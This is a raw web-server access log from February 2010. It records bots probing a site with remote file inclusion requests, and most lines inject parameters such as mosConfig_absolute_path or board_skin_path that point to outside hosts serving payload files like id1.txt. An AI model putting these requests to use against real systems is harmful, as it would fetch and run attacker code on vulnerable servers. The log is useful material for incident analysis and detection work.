91.206.206.28 - - [25/Feb/2010:06:09:05 -0800] "GET /logs/access_100218.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [25/Feb/2010:06:09:37 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [25/Feb/2010:06:09:37 -0800] "GET /write_comment_update.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [25/Feb/2010:06:09:37 -0800] "GET /logs/access_100203.log%20%20//write_comment_update.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [25/Feb/2010:06:09:39 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [25/Feb/2010:06:09:39 -0800] "GET /logs/access_100119.log//index.php?DOCUMENT_ROOT=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [25/Feb/2010:06:09:39 -0800] "GET /index.php?DOCUMENT_ROOT=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [25/Feb/2010:06:09:41 -0800] "GET /write_comment_update.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [25/Feb/2010:06:09:41 -0800] "GET /logs/access_100203.log%20%20//write_comment_update.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [25/Feb/2010:06:09:41 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.93.134.178 - - [25/Feb/2010:06:09:47 -0800] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.93.134.178 - - [25/Feb/2010:06:09:48 -0800] "GET /logs/access_100118.log%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.93.134.178 - - [25/Feb/2010:06:09:48 -0800] "GET /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [25/Feb/2010:06:09:51 -0800] "GET /logs/access_100206.log%20%20//write_comment_update.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [25/Feb/2010:06:09:52 -0800] "GET /logs/access_100206.log%20%20//write_comment_update.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.93.134.178 - - [25/Feb/2010:06:10:00 -0800] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.93.134.178 - - [25/Feb/2010:06:10:00 -0800] "GET /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.93.134.178 - - [25/Feb/2010:06:10:01 -0800] "GET /logs/access_100118.log%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:06:10:07 -0800] "GET /logs/access_100218.log/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.101.173.154 - - [25/Feb/2010:06:10:27 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; spbot/2.0; +http://www.seoprofiler.com/bot/ )" "puaga.com"
75.101.173.154 - - [25/Feb/2010:06:10:28 -0800] "GET /orange_g/forum/viewtopic.php?p=28195 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; spbot/2.0; +http://www.seoprofiler.com/bot/ )" "puaga.com"
200.93.147.154 - - [25/Feb/2010:06:11:21 -0800] "GET /logs/access_100219.log/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:06:11:31 -0800] "GET /logs/access_100218.log/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [25/Feb/2010:06:12:49 -0800] "GET /logs/access_100119.log//index.php?DOCUMENT_ROOT=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [25/Feb/2010:06:12:49 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [25/Feb/2010:06:12:49 -0800] "GET /index.php?DOCUMENT_ROOT=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:06:13:02 -0800] "GET /logs/access_100218.log/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:06:13:13 -0800] "GET /logs/access_100219.log/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:06:13:20 -0800] "GET /logs/access_100218.log/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:06:13:59 -0800] "GET /logs/access_100219.log/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [25/Feb/2010:06:13:59 -0800] "GET /logs/access_100201.log//amboard//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [25/Feb/2010:06:14:11 -0800] "GET /logs/access_100126.log//amboard//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:06:14:19 -0800] "GET /logs/access_100219.log/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [25/Feb/2010:06:17:13 -0800] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.enyzone.cz/components/com_poll/ts???? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.puaga.com"
212.241.177.123 - - [25/Feb/2010:06:17:13 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.enyzone.cz/components/com_poll/ts???? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:06:19:59 -0800] "GET /db.php?commonpath=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:06:19:59 -0800] "GET /logs//db.php?commonpath=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:06:19:59 -0800] "GET /logs/access_100118.log%20%20//db.php?commonpath=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:06:20:02 -0800] "GET /db.php?commonpath=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:06:20:02 -0800] "GET /logs/access_100118.log%20%20//db.php?commonpath=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:06:20:02 -0800] "GET /logs//db.php?commonpath=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [25/Feb/2010:06:20:05 -0800] "GET /logs//amboard//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [25/Feb/2010:06:20:05 -0800] "GET /amboard//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:06:20:23 -0800] "GET /db.php?commonpath=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:06:20:23 -0800] "GET /logs/access_100118.log%20%20//db.php?commonpath=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:06:20:23 -0800] "GET /logs//db.php?commonpath=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:06:20:31 -0800] "GET /logs/access_100218.log/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:06:21:06 -0800] "GET /logs/access_100214.log%20%20//db.php?commonpath=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:06:21:18 -0800] "GET /db.php?commonpath=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:06:21:18 -0800] "GET /logs/access_100214.log//db.php?commonpath=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:06:21:18 -0800] "GET /logs//db.php?commonpath=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:06:21:18 -0800] "GET /logs/access_100208.log//db.php?commonpath=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:06:21:24 -0800] "GET /logs/access_100131.log%20%20//db.php?commonpath=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:06:21:35 -0800] "GET /logs/access_100131.log%20%20//db.php?commonpath=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:06:21:53 -0800] "GET /logs/access_100219.log/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [25/Feb/2010:06:22:35 -0800] "GET /logs/access_100201.log%20%20//amboard//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [25/Feb/2010:06:22:48 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.enyzone.cz/components/com_poll/ts???? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.puaga.com"
212.241.177.123 - - [25/Feb/2010:06:22:48 -0800] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.enyzone.cz/components/com_poll/ts???? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.puaga.com"
110.45.145.178 - - [25/Feb/2010:06:23:11 -0800] "GET /logs/access_100126.log%20%20//amboard//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [25/Feb/2010:06:24:50 -0800] "GET /appserv/main.php?appserv_root=http://kopriusa.org/bbs/gn4/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [25/Feb/2010:06:24:50 -0800] "GET /logs/access_100126.log/appserv/main.php?appserv_root=http://kopriusa.org/bbs/gn4/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [25/Feb/2010:06:24:50 -0800] "GET /logs/appserv/main.php?appserv_root=http://kopriusa.org/bbs/gn4/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [25/Feb/2010:06:25:30 -0800] "GET /logs/access_100212.log/appserv/main.php?appserv_root=http://kopriusa.org/bbs/gn4/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [25/Feb/2010:06:27:36 -0800] "GET /logs//amboard//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [25/Feb/2010:06:27:36 -0800] "GET /logs/access_100201.log%20%20//amboard//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [25/Feb/2010:06:27:36 -0800] "GET /amboard//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.5.166 - - [25/Feb/2010:06:28:45 -0800] "GET /poll/png.php?include_path=http://nimh.snmh.go.kr/bbs/data/.../id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.5.166 - - [25/Feb/2010:06:28:45 -0800] "GET /logs//poll/png.php?include_path=http://nimh.snmh.go.kr/bbs/data/.../id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.5.166 - - [25/Feb/2010:06:28:45 -0800] "GET /logs/access_100130.log%20%20//poll/png.php?include_path=http://nimh.snmh.go.kr/bbs/data/.../id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.5.166 - - [25/Feb/2010:06:28:58 -0800] "GET /poll/png.php?include_path=http://nimh.snmh.go.kr/bbs/data/.../id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.5.166 - - [25/Feb/2010:06:28:58 -0800] "GET /logs//poll/png.php?include_path=http://nimh.snmh.go.kr/bbs/data/.../id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.5.166 - - [25/Feb/2010:06:28:58 -0800] "GET /logs/access_100130.log//poll/png.php?include_path=http://nimh.snmh.go.kr/bbs/data/.../id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [25/Feb/2010:06:29:02 -0800] "GET /logs/access_100217.log%20%20//amboard//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [25/Feb/2010:06:34:24 -0800] "GET /appserv/main.php?appserv_root=http://kopriusa.org/bbs/gn4/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [25/Feb/2010:06:34:24 -0800] "GET /logs/appserv/main.php?appserv_root=http://kopriusa.org/bbs/gn4/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [25/Feb/2010:06:34:24 -0800] "GET /logs/access_100126.log/appserv/main.php?appserv_root=http://kopriusa.org/bbs/gn4/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [25/Feb/2010:06:35:25 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.enyzone.cz/components/com_poll/ts???? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.puaga.com"
219.150.205.155 - - [25/Feb/2010:06:35:25 -0800] "GET /logs/access_100223.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.puaga.com"
219.150.205.156 - - [25/Feb/2010:06:35:25 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.puaga.com"
212.241.177.123 - - [25/Feb/2010:06:35:25 -0800] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.enyzone.cz/components/com_poll/ts???? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.puaga.com"
74.50.85.229 - - [25/Feb/2010:06:35:25 -0800] "GET /logs/access_100120.log/appserv/main.php?appserv_root=http://kopriusa.org/bbs/gn4/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.150.205.155 - - [25/Feb/2010:06:35:26 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.puaga.com"
61.63.82.14 - - [25/Feb/2010:06:40:53 -0800] "GET /lib.module.php?mod_root=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [25/Feb/2010:06:40:53 -0800] "GET /logs//lib.module.php?mod_root=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [25/Feb/2010:06:42:18 -0800] "GET /logs/access_100131.log//lib.module.php?mod_root=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [25/Feb/2010:06:43:22 -0800] "GET /amboard//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [25/Feb/2010:06:43:22 -0800] "GET /logs//amboard//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [25/Feb/2010:06:43:22 -0800] "GET /logs/access_100217.log%20%20//amboard//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
76.74.150.155 - - [25/Feb/2010:06:45:25 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
76.74.150.155 - - [25/Feb/2010:06:45:25 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
76.74.150.155 - - [25/Feb/2010:06:45:25 -0800] "GET /logs/access_100123.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
95.131.66.198 - - [25/Feb/2010:06:46:20 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
95.131.66.198 - - [25/Feb/2010:06:46:20 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
95.131.66.198 - - [25/Feb/2010:06:46:20 -0800] "GET /logs/access_100123.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
76.74.150.155 - - [25/Feb/2010:06:46:45 -0800] "GET /logs/access_100204.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [25/Feb/2010:06:47:19 -0800] "GET /logs/access_100131.log//lib.module.php?mod_root=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [25/Feb/2010:06:47:19 -0800] "GET /lib.module.php?mod_root=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [25/Feb/2010:06:47:19 -0800] "GET /logs//lib.module.php?mod_root=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [25/Feb/2010:06:47:26 -0800] "GET /logs/access_100131.log//lib.module.php?mod_root=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [25/Feb/2010:06:47:26 -0800] "GET /lib.module.php?mod_root=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [25/Feb/2010:06:47:26 -0800] "GET /logs//lib.module.php?mod_root=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
95.131.66.198 - - [25/Feb/2010:06:47:45 -0800] "GET /logs/access_100204.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:06:47:54 -0800] "GET /logs/access_100121.log%20%20//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.4bwd.com//images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:06:47:54 -0800] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.4bwd.com//images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:06:47:55 -0800] "GET /index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.4bwd.com//images/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:06:48:24 -0800] "GET /logs/access_100130.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.4bwd.com//images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:06:48:24 -0800] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.4bwd.com//images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:06:48:25 -0800] "GET /index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.4bwd.com//images/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:06:48:28 -0800] "GET /logs/access_100209.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.4bwd.com//images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:06:48:37 -0800] "GET /bbs/delete_comment.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:06:48:37 -0800] "GET /logs/access_100203.log%20%20//bbs/delete_comment.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:06:48:37 -0800] "GET /logs//bbs/delete_comment.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:06:48:47 -0800] "GET /logs/access_100130.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.4bwd.com//images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:06:48:47 -0800] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.4bwd.com//images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:06:48:48 -0800] "GET /index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.4bwd.com//images/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
